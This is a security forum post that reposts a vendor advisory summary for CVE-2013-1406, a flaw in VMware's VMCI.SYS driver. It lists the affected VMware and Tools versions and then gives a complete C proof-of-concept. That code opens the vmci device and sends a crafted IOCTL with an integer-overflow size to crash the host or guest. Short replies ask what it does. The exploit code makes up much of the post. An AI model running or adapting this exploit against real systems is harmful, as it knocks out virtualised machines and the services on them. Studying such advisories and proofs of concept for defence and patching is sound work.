VMCI.SYS IOCTL Host and Guest Privilege Elevation (CVE-2013-1406)

Nytro · March 6, 2013

[h=2]VMCI.SYS IOCTL Host and Guest Privilege Elevation (CVE-2013-1406)[/h]

Cylance, Inc.

Derek Soeder

Reported: July 12, 2012

Published: February 8, 2013

[h=4]Affected Vendor[/h] VMware, Inc.

[h=4]Affected Environments[/h] The following VMware host product versions are known to be affected: VMware Server 2.0.2 and earlier VMware Workstation 7.0.0 VMware Workstation 7.1.6 and earlier Other versions that support virtual hardware version 7 not tested due to unavailability, but assumed to be affected

The following VMware Tools versions are known to be affected:

VMware Tools 7.7.6 and earlier (VMware Server 2.0.2 and earlier)
VMware Tools 8.0.4 and earlier (VMware ESXi 4.0.0 Update 4 and earlier)
VMware Tools 8.1.3 (VMware Workstation 7.0.0)
VMware Tools 8.3.7 and earlier (VMware ESXi 4.1.0 Update 1 and earlier)
VMware Tools 8.3.12 prior to build-653202 (VMware ESXi 4.1.0 Update 2 prior to Build 659051 (without ESXi410-201204402-BG))
VMware Tools 8.4.9 and earlier (VMware Workstation 7.1.6 and earlier)
VMware Tools 8.6.0 (VMware ESXi 5.0.0)

Analiza:

http://www.cylance.com/labs/advisories/02-08-2013-Advisory.shtml

POC:

    /*
    This PoC only for version
    VMCI.SYS 9.0.13.0
    */

    #include "stdafx.h"
    #include "windows.h"

    #define count_massive 0x189                    
    #define ioctl_vmsock  0x8103208C
    #define integer_overflow_size 0x12492492;


    int _tmain(int argc, _TCHAR* argv[])
    {
            HANDLE vmci_device;
            DWORD bytesRet;
            int inbuf [count_massive];
            int outbuf[count_massive];
            int size_=count_massive*sizeof(int);

            printf("**************************************************\r\n");
            printf("
[*]0x16/7ton CVE-2013-1406 simple PoC DOS exploit*\r\n");
            printf("**************************************************\r\n");
            //opening vmci interface device
            vmci_device=CreateFileW(L"\\\\.\\vmci",GENERIC_READ,FILE_SHARE_WRITE|FILE_SHARE_READ,NULL,OPEN_EXISTING,NULL,NULL);
            if (vmci_device!=INVALID_HANDLE_VALUE)
            {
                    printf("[+]vmci device opened \r\n");
                    //prepare input buffer
                    memset(&inbuf,0,size_);
                    //vulnerable to integer overflowing parameter
                    inbuf[4]=integer_overflow_size;
                    printf("[+]After delaying we send IOCTL,prepare to BSOD \r\n");
                    //Delaying signed with Diablo stamp 
                    Sleep(0x29a);
                    Sleep(0x1000);
                    DeviceIoControl(vmci_device,ioctl_vmsock,&inbuf,size_,&outbuf,size_,&bytesRet,NULL);
                    CloseHandle(vmci_device);
            }
            else
            {
                    printf("[-]Error: Can't open vmci device!\r\n");
            }
            return 0;
    }

Sursa: [C] CVE-2013-1406 PoC DOS exploit - Pastebin.com

vipul666 · March 9, 2013

ce face?

Dark_4ngel · March 10, 2013

ce face?

Host and Guest Privilege Elevation la VMware

Sign In

VMCI.SYS IOCTL Host and Guest Privilege Elevation (CVE-2013-1406)

Recommended Posts

Nytro

vipul666

Dark_4ngel

Join the conversation

Browse

Activity

Pages